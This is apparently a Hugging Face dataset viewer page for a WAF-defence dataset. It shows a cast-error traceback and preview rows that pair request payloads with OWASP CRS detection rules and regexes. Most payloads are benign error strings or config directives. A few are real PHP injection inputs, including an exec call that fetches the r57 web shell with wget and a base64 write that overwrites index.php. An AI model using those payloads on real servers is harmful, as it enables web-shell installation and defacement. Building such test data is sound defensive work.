Dataset Preview
The full dataset viewer is not available (click to read why). Only showing a preview of the rows.
The dataset generation failed because of a cast error
Error code: DatasetGenerationCastError
Exception: DatasetGenerationCastError
Message: An error occurred while generating the dataset
All the data files must have the same columns, but at some point there are 1 new columns ({'messages'}) and 3 missing columns ({'input', 'output', 'metadata'}).
This happened while the json dataset builder was generating data using
hf://datasets/llm4waf/defend/crs_rules/openai_training.jsonl (at revision 514b13931fd8a32c359456aa4dd0bde030ca85d8)
Please either edit the data files to have matching columns, or separate them into different configurations (see docs at https://hf.co/docs/hub/datasets-manual-configuration#multiple-configurations)
Traceback: Traceback (most recent call last):
File "/usr/local/lib/python3.12/site-packages/datasets/builder.py", line 1831, in _prepare_split_single
writer.write_table(table)
File "/usr/local/lib/python3.12/site-packages/datasets/arrow_writer.py", line 714, in write_table
pa_table = table_cast(pa_table, self._schema)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.12/site-packages/datasets/table.py", line 2272, in table_cast
return cast_table_to_schema(table, schema)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.12/site-packages/datasets/table.py", line 2218, in cast_table_to_schema
raise CastError(
datasets.table.CastError: Couldn't cast
messages: list<item: struct<role: string, content: string>>
child 0, item: struct<role: string, content: string>
child 0, role: string
child 1, content: string
to
{'input': {'attack_context': {'location': List(Value('string')), 'method': Value('string')}, 'malicious_payload': List({'location': Value('string'), 'value': Value('string')})}, 'output': {'attack_type': List(Value('string')), 'detection': {'operator': {'argument': Value('string'), 'negated': Value('bool'), 'type': Value('string')}, 'variables': List({'name': Value('string'), 'negated': Value('bool'), 'part': Value('string')})}, 'severity': Value('string'), 'transformations': List(Value('string'))}, 'metadata': {'rule_id': Value('string'), 'test_description': Value('string')}}
because column names don't match
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/src/services/worker/src/worker/job_runners/config/parquet_and_info.py", line 1455, in compute_config_parquet_and_info_response
parquet_operations = convert_to_parquet(builder)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/src/services/worker/src/worker/job_runners/config/parquet_and_info.py", line 1054, in convert_to_parquet
builder.download_and_prepare(
File "/usr/local/lib/python3.12/site-packages/datasets/builder.py", line 894, in download_and_prepare
self._download_and_prepare(
File "/usr/local/lib/python3.12/site-packages/datasets/builder.py", line 970, in _download_and_prepare
self._prepare_split(split_generator, **prepare_split_kwargs)
File "/usr/local/lib/python3.12/site-packages/datasets/builder.py", line 1702, in _prepare_split
for job_id, done, content in self._prepare_split_single(
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.12/site-packages/datasets/builder.py", line 1833, in _prepare_split_single
raise DatasetGenerationCastError.from_cast_error(
datasets.exceptions.DatasetGenerationCastError: An error occurred while generating the dataset
All the data files must have the same columns, but at some point there are 1 new columns ({'messages'}) and 3 missing columns ({'input', 'output', 'metadata'}).
This happened while the json dataset builder was generating data using
hf://datasets/llm4waf/defend/crs_rules/openai_training.jsonl (at revision 514b13931fd8a32c359456aa4dd0bde030ca85d8)
Please either edit the data files to have matching columns, or separate them into different configurations (see docs at https://hf.co/docs/hub/datasets-manual-configuration#multiple-configurations)Need help to make the dataset viewer work? Make sure to review how to configure the dataset viewer, and open a discussion for direct support.
input dict | output dict | metadata dict |
|---|---|---|
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "{\"body\": \"SyntaxError (/path/to/your/app/controllers/reflects_controller.rb:10: syntax error, unexpected keyword_end)\"}"
}
]
} | {
"attack_type": [
"attack-disclosure"
],
"detection": {
"operator": {
"argument": "ruby-errors.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "RESPONSE_BODY",
"negated": false,
"part": ""
}
]
},
"severity": ... | {
"rule_id": "956100",
"test_description": "Ruby SyntaxError"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "{\"body\": \"NameError (undefined local variable or method `unexistent_variable' for #<PostsController:0x00007f...>\"}"
}
]
} | {
"attack_type": [
"attack-disclosure"
],
"detection": {
"operator": {
"argument": "ruby-errors.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "RESPONSE_BODY",
"negated": false,
"part": ""
}
]
},
"severity": ... | {
"rule_id": "956100",
"test_description": "Ruby NameError"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "{\"body\": \"ActiveRecord::RecordNotFound (Couldn't find Post with 'id'=999)\"}"
}
]
} | {
"attack_type": [
"attack-disclosure"
],
"detection": {
"operator": {
"argument": "ruby-errors.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "RESPONSE_BODY",
"negated": false,
"part": ""
}
]
},
"severity": ... | {
"rule_id": "956100",
"test_description": "Ruby ActiveRecord::RecordNotFound"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "{\"body\": \"ActionView::Template::Error (undefined method 'name' for nil:NilClass)\"}"
}
]
} | {
"attack_type": [
"attack-disclosure"
],
"detection": {
"operator": {
"argument": "ruby-errors.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "RESPONSE_BODY",
"negated": false,
"part": ""
}
]
},
"severity": ... | {
"rule_id": "956100",
"test_description": "Ruby ActionView::Template::Error"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "{\"body\": \"TypeError: no implicit conversion of String into Integer\"}"
}
]
} | {
"attack_type": [
"attack-disclosure"
],
"detection": {
"operator": {
"argument": "ruby-errors.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "RESPONSE_BODY",
"negated": false,
"part": ""
}
]
},
"severity": ... | {
"rule_id": "956100",
"test_description": "Ruby TypeError"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "{\"body\": \"NoMethodError: undefined method 'author_name' for #<User:0x00007f...>\"}"
}
]
} | {
"attack_type": [
"attack-disclosure"
],
"detection": {
"operator": {
"argument": "ruby-errors.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "RESPONSE_BODY",
"negated": false,
"part": ""
}
]
},
"severity": ... | {
"rule_id": "956100",
"test_description": "Ruby NoMethodError"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "{\"body\": \"ArgumentError: wrong number of arguments (given 0, expected 1)\"}"
}
]
} | {
"attack_type": [
"attack-disclosure"
],
"detection": {
"operator": {
"argument": "ruby-errors.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "RESPONSE_BODY",
"negated": false,
"part": ""
}
]
},
"severity": ... | {
"rule_id": "956100",
"test_description": "Ruby ArgumentError"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "{\"body\": \"ActionController::RoutingError: No route matches [GET] \"}"
}
]
} | {
"attack_type": [
"attack-disclosure"
],
"detection": {
"operator": {
"argument": "ruby-errors.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "RESPONSE_BODY",
"negated": false,
"part": ""
}
]
},
"severity": ... | {
"rule_id": "956100",
"test_description": "Ruby ActionController::RoutingError"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "{\"body\": \"ActionController::ParameterMissing: param is missing or the value is empty: comment\"}"
}
]
} | {
"attack_type": [
"attack-disclosure"
],
"detection": {
"operator": {
"argument": "ruby-errors.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "RESPONSE_BODY",
"negated": false,
"part": ""
}
]
},
"severity": ... | {
"rule_id": "956100",
"test_description": "Ruby ActionController::ParameterMissing"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "{\"fileuploaderror\":\"File upload failed.\"}"
}
]
} | {
"attack_type": [
"attack-disclosure"
],
"detection": {
"operator": {
"argument": "ruby-errors.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "RESPONSE_BODY",
"negated": false,
"part": ""
}
]
},
"severity": ... | {
"rule_id": "956100",
"test_description": "False Positive: Roundcube defining error message for frontend, matching `loaderror` in `fileuploaderror`"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "{ \"noJavascriptError\":\"SOGo requires Javascript to run. Please make sure this option is available and activated within your browser preferences.\"... | {
"attack_type": [
"attack-disclosure"
],
"detection": {
"operator": {
"argument": "ruby-errors.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "RESPONSE_BODY",
"negated": false,
"part": ""
}
]
},
"severity": ... | {
"rule_id": "956100",
"test_description": "False Positive: SOGo defining error message for frontend, matching `scriptError` in `noJavascriptError`"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "{\"body\": \"<% end %>\"}"
}
]
} | {
"attack_type": [
"attack-disclosure"
],
"detection": {
"operator": {
"argument": "(?i)(?:<%[=#\\s]|#\\{[^}]+\\})",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "RESPONSE_BODY",
"negated": false,
"part": ""
}
]
},
"sever... | {
"rule_id": "956110",
"test_description": "Ruby ERB Template leakage"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "{\"body\": \"<p>Name: <%= @user.name %></p>\"}"
}
]
} | {
"attack_type": [
"attack-disclosure"
],
"detection": {
"operator": {
"argument": "(?i)(?:<%[=#\\s]|#\\{[^}]+\\})",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "RESPONSE_BODY",
"negated": false,
"part": ""
}
]
},
"sever... | {
"rule_id": "956110",
"test_description": "Ruby ERB Template leakage"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "{\"body\": \"p Name: #{user.name}\"}"
}
]
} | {
"attack_type": [
"attack-disclosure"
],
"detection": {
"operator": {
"argument": "(?i)(?:<%[=#\\s]|#\\{[^}]+\\})",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "RESPONSE_BODY",
"negated": false,
"part": ""
}
]
},
"sever... | {
"rule_id": "956110",
"test_description": "Ruby Slim Interpolation"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "<%- sidebar.id %>"
}
]
} | {
"attack_type": [
"attack-disclosure"
],
"detection": {
"operator": {
"argument": "(?i)(?:<%[=#\\s]|#\\{[^}]+\\})",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "RESPONSE_BODY",
"negated": false,
"part": ""
}
]
},
"sever... | {
"rule_id": "956110",
"test_description": "False Positive: Don't match templates for WordPress site customizer"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=<?exec('wget%20http://r57.biz/r57.txt%20-O"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",... | {
"rule_id": "933100",
"test_description": "PHP Injection Attack (933100) from old modsec regressions"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=%3C%3Fphp%20echo(%5C%22KURWA%5C%22)%3B%20file_put_contents(%5C%22.%2Findex.php%5C%22%2C%20base64_decode(%5C%22Pz48aWZyYW1lIHNyYz0iaHR0cDovL3p1by... | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",... | {
"rule_id": "933100",
"test_description": "PHP Injection Attack (933100) from old modsec regressions"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=somePhpWouldGoHere%5B%2Fphp%5D"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",... | {
"rule_id": "933100",
"test_description": "PHP injection attack: looking for [/php] closing tag"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=somePhpWouldGoHere%5B%5Cphp%5D"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",... | {
"rule_id": "933100",
"test_description": "PHP injection attack: looking for [\\php] closing tag"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=%3C%3Fxml%20%3Aecho%201%3B"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",... | {
"rule_id": "933100",
"test_description": "xml/php polyglot payload, using a PHP\ndecoded payload: <?xml :echo 1;'\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=%3C%3Fxml%20%3Aecho%201%3B"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",... | {
"rule_id": "933100",
"test_description": "xml/php polyglot payload, using a PHP, uppercase test\ndecoded payload: <?XML :echo 1;'\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=%3C%3Fxml%20%3AfputCSV%28%24alreadyOpenFile%2C%20array%28%22foo%22%2C%20%22bar%22%2C%20%22hello%22%2C%20%22world%22%29%29%3B"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",... | {
"rule_id": "933100",
"test_description": "xml/php polyglot payload, using a PHP\ndecoded payload: <?xml :fputCSV($alreadyOpenFile, array(\"foo\", \"bar\", \"hello\", \"world\"));'\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=%3C%3Fxml%20%20%20%09%09%09%09%09%09%20%28%29%3Becho%201%3B"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)<\\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\\s\\x0b]|[\\s\\x0b]+[^a-z]|$)))|$|php)|\\[[/\\x5c]?php\\]",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",... | {
"rule_id": "933100",
"test_description": "xml/php polyglot payload, using a PHP\ndecoded payload: <?xml \t\t\t\t\t\t ();echo 1;\n"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "----------397236876\nContent-Disposition: form-data; name=\"fileRap\"; filename=\"something/dangerous.php\"\nContent-Type: text/plain\n\nplease block... | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": ".*\\.ph(?:p\\d*|tml|ar|ps|t|pt)\\.*$",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "FILES",
"negated": false,
"part": ""
},
{
"... | {
"rule_id": "933110",
"test_description": "PHP upload via multipart"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "----------397236876\nContent-Disposition: form-data; name=\"something/dangerous.php\"; filename=\"safe.txt\"\nContent-Type: text/plain\n\nplease don'... | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": ".*\\.ph(?:p\\d*|tml|ar|ps|t|pt)\\.*$",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "FILES",
"negated": false,
"part": ""
},
{
"... | {
"rule_id": "933110",
"test_description": "PHP upload via multipart should pass"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "----------397236876\nContent-Disposition: form-data; name=\"file\"; filename=\"safe.phpinfo\"\nContent-Type: text/plain\n\nplease don't block me\n---... | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": ".*\\.ph(?:p\\d*|tml|ar|ps|t|pt)\\.*$",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "FILES",
"negated": false,
"part": ""
},
{
"... | {
"rule_id": "933110",
"test_description": "PHP upload via multipart should pass"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "var=opcache.jit_max_polymorphic_calls%3d50"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(... | {
"rule_id": "933120",
"test_description": "PHP Injection Attack: Configuration Directive"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "var=session.referer_check%3dtrue"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(... | {
"rule_id": "933120",
"test_description": "Test correct logging"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "var=engine%3dtrue"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(... | {
"rule_id": "933120",
"test_description": "PHP Injection Attack: Configuration Directive: engine"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "var=extension%3dtrue"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(... | {
"rule_id": "933120",
"test_description": "PHP Injection Attack: Configuration Directive: extension"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "var=mbstring.regex_retry_limit%3dtrue"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(... | {
"rule_id": "933120",
"test_description": "PHP Injection Attack: Configuration Directive: mbstring.regex_retry_limit"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "var=mbstring.regex_stack_limit%3dtrue"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(... | {
"rule_id": "933120",
"test_description": "PHP Injection Attack: Configuration Directive: mbstring.regex_stack_limit"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "var=precision%3dtrue"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(... | {
"rule_id": "933120",
"test_description": "PHP Injection Attack: Configuration Directive: precision"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "var=smtp%3dtrue"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(... | {
"rule_id": "933120",
"test_description": "PHP Injection Attack: Configuration Directive: smtp"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "var=unserialize_max_depth%3dtrue"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(... | {
"rule_id": "933120",
"test_description": "PHP Injection Attack: Configuration Directive: unserialize_max_depth"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "SAMLRequest=mhXNy9pMlFhTjBlRkkzSkpia1Y2cSMtPEE9PTwvc2FtbDpBdHRyaWJ1dGVWYWx1ZT48L3NhbWw6QXR0cmlidXRlPjwvc2FtbDpBdHRyaWJ1dGVTdGF0ZW1lbnQ+PC9zYW1sOkFzc... | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(... | {
"rule_id": "933120",
"test_description": "FP PHP Injection Attack: prevent matching base64 encoded requests"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "code=memory_limit%20=%20512M"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(... | {
"rule_id": "933120",
"test_description": "PHP Injection Attack: Block config directive with whitespace"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "code=extension_dir=/path/to/example"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)\\b(?:a(?:llow_url_(?:fopen|include)|pc.(?:coredump_unmap|en(?:able(?:_cli|d)|tries_hint)|(?:gc_)?ttl|mmap_file_mask|preload_path|s(?:erializer|hm_s(?:egments|ize)|lam_defense)|use_request_time)|rg_separator.(... | {
"rule_id": "933120",
"test_description": "PHP Injection Attack: Block config directive with a path"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "x=$_SERVER['test'];"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-variables.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
{
"... | {
"rule_id": "933130",
"test_description": "Trigger a basic request"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "x=$_SE%20RVER['test'];"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-variables.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
{
"... | {
"rule_id": "933130",
"test_description": "Non-Server Request"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "x=$_%53ERVER['test'];"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-variables.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
{
"... | {
"rule_id": "933130",
"test_description": "SERVER request URLEncoded"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "%24_COOKIE=value;"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-variables.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
{
"... | {
"rule_id": "933130",
"test_description": "SERVER request URLEncoded"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "x=$_%53%20ERVER['request_uri'];"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-variables.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
{
"... | {
"rule_id": "933130",
"test_description": "SERVER index listed with obfuscated SERVER"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=%24%7B%27ff%27%7D"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
{
... | {
"rule_id": "933135",
"test_description": "${'ff'}"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=%24%20%7B%27fdf%27%7D"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
{
... | {
"rule_id": "933135",
"test_description": "$ {'fdf'}"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=%24%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7B%24a%7D"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
{
